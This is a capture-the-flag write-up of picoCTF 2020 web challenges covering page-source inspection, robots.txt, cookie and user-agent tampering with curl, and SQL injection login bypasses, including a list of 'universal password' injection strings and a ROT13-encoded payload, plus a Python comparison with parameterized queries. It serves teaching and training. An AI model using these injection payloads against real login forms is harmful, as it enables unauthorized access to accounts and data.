picoCTF2020_Web

This post covers the Web Exploitation section of picoCTF 2020: recovering parts of a flag from the page source, finding a hidden page via /robots.txt, manipulating client-side state, passing parameters on the command line, changing the user agent, and dealing with filtering and encoding to recover the flag. Through these challenges the author learned about web security and bypass strategies.



picoCTF

Web Exploitation


Insp3ct0r

How do you inspect web code on a browser? There are 3 parts

Ctrl+U to view the page source -> 1/3 of the flag: picoCTF{tru3_d3

View the source of mycss.css -> 2/3 of the flag: t3ct1ve_0r_ju5t

View the source of myjs.js -> 3/3 of the flag: _lucky?2e7b23e3}

where are the robots

What part of the website could tell you where the creator doesn’t want you to look?

The description mentions robots, so request /robots.txt.

It returns:

User-agent: *
Disallow: /1bb4c.html

Request /1bb4c.html to get the flag.

dont-use-client-side

Never trust the client

View the source:

function verify() {
  checkpass = document.getElementById("pass").value;
  split = 4;
  if (checkpass.substring(0, split) == 'pico') {
    if (checkpass.substring(split*6, split*7) == '706c') {
      if (checkpass.substring(split, split*2) == 'CTF{') {
        if (checkpass.substring(split*4, split*5) == 'ts_p') {
          if (checkpass.substring(split*3, split*4) == 'lien') {
            if (checkpass.substring(split*5, split*6) == 'lz_b') {
              if (checkpass.substring(split*2, split*3) == 'no_c') {
                if (checkpass.substring(split*7, split*8) == '5}') {
                  alert("Password Verified")
                }
              }
            }
          }
        }
      }
    }
  }
  else {
    alert("Incorrect password");
  }
}

Read the code and piece the flag together from the substring offsets (the checks are compared out of order, but each offset is a multiple of 4).

logon

Hmm it doesn’t seem to check anyone’s password, except for logon’s?

Following the hint, log in as logon; nothing happens. But in EditThisCookie there is now an extra admin cookie. Change admin from False to True, lock it, set the path, and refresh to get the flag.

Client-side-again

Passing parameters on the command line

What is obfuscation?

Open-to-admins

Can cookies help you to get the flag?

This challenge taught me another way to send cookies:

curl "https://jupiter.challenges.picoctf.org/problem/51400/" -H "Cookie:admin=True;time=1400;" -s

and

grep picoCTF

to search the response for the keyword.

picobrowser

Changing the user agent

You don’t need to download a new web browser

curl --user-agent "picobrowser" "https://jupiter.challenges.picoctf.org/problem/13759/flag" | grep picoCTF

This prints the line containing the flag.

Irish-Name-Repo 1

There doesn’t seem to be many ways to interact with this. I wonder if the users are kept in a database? Try to think about how the website verifies your login.

This challenge introduced me to the classic "universal password" strings used against web back ends:

"or "a"="a

')or('a'='a

or 1=1--

'or 1=1--

a'or' 1=1--

"or 1=1--

'or'a'='a

"or"="a'='a

'or''='

'or'='or'

1 or '1'='1'=1

1 or '1'='1' or 1=1

'OR 1=1

"or 1=1

'xor

Put simply, you append a condition that is always true to the value you submit, so the query succeeds regardless of the real credentials. Learned something.
From this, the input for this challenge is

debug=1&password=&username=admin' or '1'=='1
username: admin' or '1'=='1
password: 
SQL query: SELECT * FROM users WHERE name='admin' or '1'=='1' AND password=''

which yields the flag.

Irish-Name-Repo 2

The password is being filtered.

debug=1&password=1&username=admin'--
username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'
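The two debug outputs above (Irish-Name-Repo 1 and 2) show the query being assembled by string concatenation. As an added example, not part of the original writeup, the following Python reproduces both payloads against a constructed SQLite table and puts the same lookup with bound parameters beside it; the table contents and function names are assumptions.

```python
import sqlite3

# Constructed sample data, not the challenge's real user table.
USERS = [("admin", "s3cret"), ("alice", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Assemble the query by concatenation, as the challenge's debug output shows.
    Returns (query text, list of matched user names)."""
    query = ("SELECT name FROM users WHERE name='" + username +
             "' AND password='" + password + "'")
    return query, [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the quote in the input stays data."""
    query = "SELECT name FROM users WHERE name=? AND password=?"
    return [row[0] for row in conn.execute(query, (username, password))]


# Payloads from the writeup above.
REPO1 = "admin' or '1'=='1"   # AND binds tighter than OR, so name='admin' alone suffices
REPO2 = "admin'--"            # the comment removes the password check entirely

if __name__ == "__main__":
    conn = make_db()
    for user, pw in ((REPO1, ""), (REPO2, "1")):
        query, hits = login_vulnerable(conn, user, pw)
        print(query)
        print("  vulnerable ->", hits)                  # ['admin'] in both cases
        print("  parameterized ->", login_safe(conn, user, pw))  # [] in both cases
```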

Irish-Name-Repo 3

Seems like the password is encrypted.

Try

debug=1&password=adsf

and the response shows

password: adsf
SQL query: SELECT * FROM admin where password = 'nqfs'

This differs from the input, so the program transforms the password before building the query. Comparing the two strings, the transformation is ROT13, so we can submit our payload ROT13-encoded and it will be decoded into the query we want.

debug=1&password=' BE '1'='1

password: ' BE '1'='1
SQL query: SELECT * FROM admin where password = '' OR '1'='1'

which yields the flag.
